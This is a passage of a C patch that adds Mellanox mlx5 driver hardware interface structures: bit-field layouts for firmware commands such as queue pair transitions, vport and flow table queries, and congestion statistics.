mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits eth_2863_cntrs_grp_data_layout; + struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits eth_2819_cntrs_grp_data_layout; + struct mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits eth_3635_cntrs_grp_data_layout; + struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits eth_extended_cntrs_grp_data_layout; + struct mlx5_ifc_eth_per_prio_grp_data_layout_bits eth_per_prio_grp_data_layout; + struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits eth_per_traffic_grp_data_layout; + struct mlx5_ifc_phys_layer_cntrs_bits phys_layer_cntrs; + u8 reserved_0[0x7c0]; +}; + +union mlx5_ifc_event_auto_bits { + struct mlx5_ifc_comp_event_bits comp_event; + struct mlx5_ifc_dct_events_bits dct_events; + struct mlx5_ifc_qp_events_bits qp_events; + struct mlx5_ifc_wqe_associated_page_fault_event_bits wqe_associated_page_fault_event; + struct mlx5_ifc_rdma_page_fault_event_bits rdma_page_fault_event; + struct mlx5_ifc_cq_error_bits cq_error; + struct mlx5_ifc_dropped_packet_logged_bits dropped_packet_logged; + struct mlx5_ifc_port_state_change_event_bits port_state_change_event; + struct mlx5_ifc_gpio_event_bits gpio_event; + struct mlx5_ifc_db_bf_congestion_event_bits db_bf_congestion_event; + struct mlx5_ifc_stall_vl_event_bits stall_vl_event; + struct mlx5_ifc_cmd_inter_comp_event_bits cmd_inter_comp_event; + u8 reserved_0[0xe0]; +}; + +struct mlx5_ifc_health_buffer_bits { + u8 reserved_0[0x100]; + + u8 assert_existptr[0x20]; + + u8 assert_callra[0x20]; + + u8 reserved_1[0x40]; + + u8 fw_version[0x20]; + + u8 hw_id[0x20]; + + u8 reserved_2[0x20]; + + u8 irisc_index[0x8]; + u8 synd[0x8]; + u8 ext_synd[0x10]; +}; + +struct mlx5_ifc_register_loopback_control_bits { + u8 no_lb[0x1]; + u8 reserved_0[0x7]; + u8 port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_teardown_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_TEARDOWN_HCA_IN_PROFILE_GRACEFUL_CLOSE = 0x0, + MLX5_TEARDOWN_HCA_IN_PROFILE_PANIC_CLOSE = 0x1, +}; + +struct mlx5_ifc_teardown_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 profile[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_sqerr2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_sqerr2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_sqd2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_sqd2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_set_roce_address_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_roce_address_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 roce_address_index[0x10]; + u8 reserved_2[0x10]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_roce_addr_layout_bits roce_address; +}; + +struct mlx5_ifc_set_mad_demux_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_SET_MAD_DEMUX_IN_DEMUX_MODE_PASS_ALL = 0x0, + MLX5_SET_MAD_DEMUX_IN_DEMUX_MODE_SELECTIVE = 0x2, +}; + +struct mlx5_ifc_set_mad_demux_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x6]; + u8 demux_mode[0x2]; + u8 reserved_4[0x18]; +}; + +struct mlx5_ifc_set_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x13]; + u8 vlan_valid[0x1]; + u8 vlan[0xc]; + + struct mlx5_ifc_mac_address_layout_bits mac_address; + + u8 reserved_6[0xc0]; +}; + +struct mlx5_ifc_set_issi_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_issi_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 current_issi[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_set_hca_cap_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_hca_cap_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + union mlx5_ifc_hca_cap_union_bits capability; +}; + +struct mlx5_ifc_set_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; + + struct mlx5_ifc_flow_context_bits flow_context; +}; + +struct mlx5_ifc_rts2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_rts2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_rtr2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_rtr2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_rst2init_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_rst2init_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_query_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_xrc_srqc_bits xrc_srq_context_entry; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +enum { + MLX5_QUERY_VPORT_STATE_OUT_STATE_DOWN = 0x0, + MLX5_QUERY_VPORT_STATE_OUT_STATE_UP = 0x1, +}; + +struct mlx5_ifc_query_vport_state_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 reserved_2[0x18]; + u8 admin_state[0x4]; + u8 state[0x4]; +}; + +enum { + MLX5_QUERY_VPORT_STATE_IN_OP_MOD_VNIC_VPORT = 0x0, +}; + +struct mlx5_ifc_query_vport_state_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_vport_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_traffic_counter_bits received_errors; + + struct mlx5_ifc_traffic_counter_bits transmit_errors; + + struct mlx5_ifc_traffic_counter_bits received_ib_unicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_ib_unicast; + + struct mlx5_ifc_traffic_counter_bits received_ib_multicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_ib_multicast; + + struct mlx5_ifc_traffic_counter_bits received_eth_broadcast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_broadcast; + + struct mlx5_ifc_traffic_counter_bits received_eth_unicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_unicast; + + struct mlx5_ifc_traffic_counter_bits received_eth_multicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_multicast; + + u8 reserved_2[0xa00]; +}; + +enum { + MLX5_QUERY_VPORT_COUNTER_IN_OP_MOD_VPORT_COUNTERS = 0x0, +}; + +struct mlx5_ifc_query_vport_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x60]; + + u8 clear[0x1]; + u8 reserved_4[0x1f]; + + u8 reserved_5[0x20]; +}; + +struct mlx5_ifc_query_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_tisc_bits tis_context; +}; + +struct mlx5_ifc_query_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_tirc_bits tir_context; +}; + +struct mlx5_ifc_query_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_srqc_bits srq_context_entry; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_sqc_bits sq_context; +}; + +struct mlx5_ifc_query_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_special_contexts_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 resd_lkey[0x20]; +}; + +struct mlx5_ifc_query_special_contexts_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rqtc_bits rqt_context; +}; + +struct mlx5_ifc_query_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rqc_bits rq_context; +}; + +struct mlx5_ifc_query_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_roce_address_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_roce_addr_layout_bits roce_address; +}; + +struct mlx5_ifc_query_roce_address_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 roce_address_index[0x10]; + u8 reserved_2[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xc0]; + + struct mlx5_ifc_rmpc_bits rmp_context; +}; + +struct mlx5_ifc_query_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 opt_param_mask[0x20]; + + u8 reserved_2[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_3[0x80]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 rx_write_requests[0x20]; + + u8 reserved_2[0x20]; + + u8 rx_read_requests[0x20]; + + u8 reserved_3[0x20]; + + u8 rx_atomic_requests[0x20]; + + u8 reserved_4[0x20]; + + u8 rx_dct_connect[0x20]; + + u8 reserved_5[0x20]; + + u8 out_of_buffer[0x20]; + + u8 reserved_6[0x20]; + + u8 out_of_sequence[0x20]; + + u8 reserved_7[0x620]; +}; + +struct mlx5_ifc_query_q_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x80]; + + u8 clear[0x1]; + u8 reserved_3[0x1f]; + + u8 reserved_4[0x18]; + u8 counter_set_id[0x8]; +}; + +struct mlx5_ifc_query_pages_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x10]; + u8 function_id[0x10]; + + u8 num_pages[0x20]; +}; + +enum { + MLX5_QUERY_PAGES_IN_OP_MOD_BOOT_PAGES = 0x1, + MLX5_QUERY_PAGES_IN_OP_MOD_INIT_PAGES = 0x2, + MLX5_QUERY_PAGES_IN_OP_MOD_REGULAR_PAGES = 0x3, +}; + +struct mlx5_ifc_query_pages_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_nic_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_nic_vport_context_bits nic_vport_context; +}; + +struct mlx5_ifc_query_nic_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x5]; + u8 allowed_list_type[0x3]; + u8 reserved_4[0x18]; +}; + +struct mlx5_ifc_query_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_mkc_bits memory_key_mkey_entry; + + u8 reserved_2[0x600]; + + u8 bsf0_klm0_pas_mtt0_1[16][0x8]; + + u8 bsf1_klm1_pas_mtt2_3[16][0x8]; +}; + +struct mlx5_ifc_query_mkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 mkey_index[0x18]; + + u8 pg_access[0x1]; + u8 reserved_3[0x1f]; +}; + +struct mlx5_ifc_query_mad_demux_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 mad_dumux_parameters_block[0x20]; +}; + +struct mlx5_ifc_query_mad_demux_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xa0]; + + u8 reserved_2[0x13]; + u8 vlan_valid[0x1]; + u8 vlan[0xc]; + + struct mlx5_ifc_mac_address_layout_bits mac_address; + + u8 reserved_3[0xc0]; +}; + +struct mlx5_ifc_query_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x140]; +}; + +struct mlx5_ifc_query_issi_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x10]; + u8 current_issi[0x10]; + + u8 reserved_2[0xa0]; + + u8 supported_issi_reserved[76][0x8]; + u8 supported_issi_dw0[0x20]; +}; + +struct mlx5_ifc_query_issi_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_hca_vport_pkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_pkey_bits pkey[0]; +}; + +struct mlx5_ifc_query_hca_vport_pkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x10]; + u8 pkey_index[0x10]; +}; + +struct mlx5_ifc_query_hca_vport_gid_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 gids_num[0x10]; + u8 reserved_2[0x10]; + + struct mlx5_ifc_array128_auto_bits gid[0]; +}; + +struct mlx5_ifc_query_hca_vport_gid_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x10]; + u8 gid_index[0x10]; +}; + +struct mlx5_ifc_query_hca_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_hca_vport_context_bits hca_vport_context; +}; + +struct mlx5_ifc_query_hca_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_hca_cap_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + union mlx5_ifc_hca_cap_union_bits capability; +}; + +struct mlx5_ifc_query_hca_cap_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_query_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x80]; + + u8 reserved_2[0x8]; + u8 level[0x8]; + u8 reserved_3[0x8]; + u8 log_size[0x8]; + + u8 reserved_4[0x120]; +}; + +struct mlx5_ifc_query_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x140]; +}; + +struct mlx5_ifc_query_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x1c0]; + + struct mlx5_ifc_flow_context_bits flow_context; +}; + +struct mlx5_ifc_query_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; +}; + +enum { + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_OUTER_HEADERS = 0x0, + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_MISC_PARAMETERS = 0x1, + MLX5_QUERY_FLOW_GROUP_OUT_MATCH_CRITERIA_ENABLE_INNER_HEADERS = 0x2, +}; + +struct mlx5_ifc_query_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0xa0]; + + u8 start_flow_index[0x20]; + + u8 reserved_2[0x20]; + + u8 end_flow_index[0x20]; + + u8 reserved_3[0xa0]; + + u8 reserved_4[0x18]; + u8 match_criteria_enable[0x8]; + + struct mlx5_ifc_fte_match_param_bits match_criteria; + + u8 reserved_5[0xe00]; +}; + +struct mlx5_ifc_query_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 group_id[0x20]; + + u8 reserved_5[0x120]; +}; + +struct mlx5_ifc_query_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_eqc_bits eq_context_entry; + + u8 reserved_2[0x40]; + + u8 event_bitmask[0x40]; + + u8 reserved_3[0x580]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_dctc_bits dct_context_entry; + + u8 reserved_2[0x180]; +}; + +struct mlx5_ifc_query_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_status_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 enable[0x1]; + u8 tag_enable[0x1]; + u8 reserved_2[0x1e]; +}; + +struct mlx5_ifc_query_cong_status_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 priority[0x4]; + u8 cong_protocol[0x4]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_statistics_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 cur_flows[0x20]; + + u8 sum_flows[0x20]; + + u8 cnp_ignored_high[0x20]; + + u8 cnp_ignored_low[0x20]; + + u8 cnp_handled_high[0x20]; + + u8 cnp_handled_low[0x20]; + + u8 reserved_2[0x100]; + + u8 time_stamp_high[0x20]; + + u8 time_stamp_low[0x20]; + + u8 accumulators_period[0x20]; + + u8 ecn_marked_roce_packets_high[0x20]; + + u8 ecn_marked_roce_packets_low[0x20]; + + u8 cnps_sent_high[0x20]; + + u8 cnps_sent_low[0x20]; + + u8 reserved_3[0x560]; +}; + +struct mlx5_ifc_query_cong_statistics_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 clear[0x1]; + u8 reserved_2[0x1f]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_cong_params_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + union mlx5_ifc_cong_control_roce_ecn_auto_bits congestion_parameters; +}; + +struct mlx5_ifc_query_cong_params_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x1c]; + u8 cong_protocol[0x4]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_adapter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_query_adapter_param_block_bits query_adapter_struct; +}; + +struct mlx5_ifc_query_adapter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 